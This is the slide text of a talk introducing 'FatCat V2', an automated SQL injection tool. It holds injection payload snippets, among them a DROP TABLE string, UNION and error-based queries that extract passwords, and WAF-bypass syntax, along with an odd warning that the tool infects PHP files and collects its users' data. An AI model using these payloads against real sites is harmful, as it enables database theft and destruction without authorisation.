FatCat V2– Automatic Web [S]QL-Injector

Sandeep Kamble AKA [S]Parason INC

Blog : http://sandeepkamble.com Twitter: @SandeepL337

•Narcissistic Vulnerability Pimp (aka Security Researcher for fun)

•Listed in Google , Facebook , Twitter , Drop box , Cloud flare , 500px , Lynda.com , Central Desktop Security Pages.

•Ahhh ? What are those Vulnerabilities

•Member of Garage4hackers.com & you can find POC @G4h.

# /usr/bin/whoami

Index

•Introducing FatCat Beta 2•SQL Injection in Brief• FatCat Injgredients

1) DB Information & server Information gathering.2) Normal SQL injection.3) Error Based SQL injection.4) WAF (Web Application Firewall)Bypass functions.

• C-Style Mysql comment WAF Bypass• Buffer overflow WAF Bypass• CRLF WAF Bypass• Bypass with Information_schema.statics• Bypass with Information_schema.key_column_usage

5) Countermeasures 6) Demo

Provide Good Advise for Good People

Warning! : FatCat is being used for security research. All PHP files will be

infected and all yours data will be collected. If you want to be safe, don't use this Tool. If you do that, don't send

sensitive information. If after all you continue, do it on your own risk

1)It’s New , it’s cool to use , inject web! 2)Normal SQL injection 3)Error Based SQL injection 4)WAF (Web application firewall ) Bypass

function. 5)Helpful to Pentester – You can create POC

from anywhere .6)It supports Mysql 5.0 7)Developed in PHP 8)FatCat made 3400+ Downloads on

Code.google.com

Ladies gentleman introducing FatCat V2

SQL injection in Brief

“SQL Injection happens when user manipulate input & form a SQL Query. “

Sending payload !@#$%^&*()

It’s me .. Hi, :/ Payload : ; Drop table Clubhackparty -- -

1)DB Information & server Information gathering.

2)Normal SQL injection.3)Error Based SQL injection.4)WAF (Web Application Firewall)Bypass

functions.

FatCat Ingredients

1)DB Information & server Information gathering.1. Finding Total Column Count

• Order by n+1;2. Finding MySQL Version

• VERSION () Function3. Finding current User

• User() Function 4. Finding Data Directory

• @@datadir Function5. Finding Base Directory

• @@basedir Function6. Finding Host Name

• @@hostname Function 7. Finding Operating System

• @@version_compile_os Function 8. Finding Current Database name

• Database() Function

By using MYSQL Statement , Db & Server information can be gathered

FatCat Ingredients

9. Max allowed Packet size• @@max_allowed_packet

function

1)Normal SQL injection •It is also Know as Union SQL injection •Union help us to combine two result set of the select statement •Eg: Id=-2+Union+select+13371,13372,13373,13374-- -

FatCat Ingredients

2) Error based SQL injection •It is also Know as Double Query SQL injection •Some times union based SQLi get fails that time you can use Error based SQLi• A query which confuse the DB engine and produce helpful mysql errors •Eg: select gmailid,(select password from id where id=9)

As Google_India from id;

FatCat Ingredients

FatCat web interface

Sending payload !@#$W00T%^&*()

Aww .. ! Double Query

duplicate entry '~‘Clubhack_screte'~1' for key 1

3) WAF (Web application Firewall) Bypass ?

FatCat Ingredients

FatCat Ingredients

1.Protection Against OWASP Top Ten!2.Types of Vulnerabilities it can prevent.3.Brute Force protection.

In simple language , It’s Monitor HTTP conversation

3) WAF (Web application Firewall) Bypass

FatCat Ingredients

•We use Following Methods to bypass WAF• C-Style Mysql comment WAF Bypass• Buffer overflow WAF Bypass• CRLF WAF Bypass• Bypass with Information_schema.statics• Bypass with Information_schema.key_column_usage

•Linux Based WAFS • AppArmor• ModSecurity - Also works under Mac OS X, Solaris and other

versions of Unix.• Systrace• Zorp

3) WAF (Web application Firewall) Bypass

1. Mysql Comment WAF bypass • Syntax /*! Mysql Statements */• Example

FatCat Ingredients

3) WAF (Webapplication Firwall) Bypass

1. Buffer Overflow WAF bypass • Syntax : ‘ AAAAAAAAAAAAAAAAAAAAAAAAAAAA Mysql Statement • Example:

FatCat Ingredients

3) WAF (Webapplication Firwall) Bypass

1. CRLF WAF Bypass Syntax : %0A%0D+Mysql Statements+%0A%0

Example :

FatCat Ingredients

3) WAF (Webapplication Firwall) Bypass

1. Bypass with information_schema.key_column_usage

Example :

FatCat Ingredients

3) WAF (Webapplication Firwall) Bypass

1. Bypass with information_schema.statics

Example :

FatCat Ingredients

Countermeasures for SQLI

Lets Inject with FatCat

A Gentleman never asks.

A Lady never tells.

Any Questions ?

</presentation>

Thank you !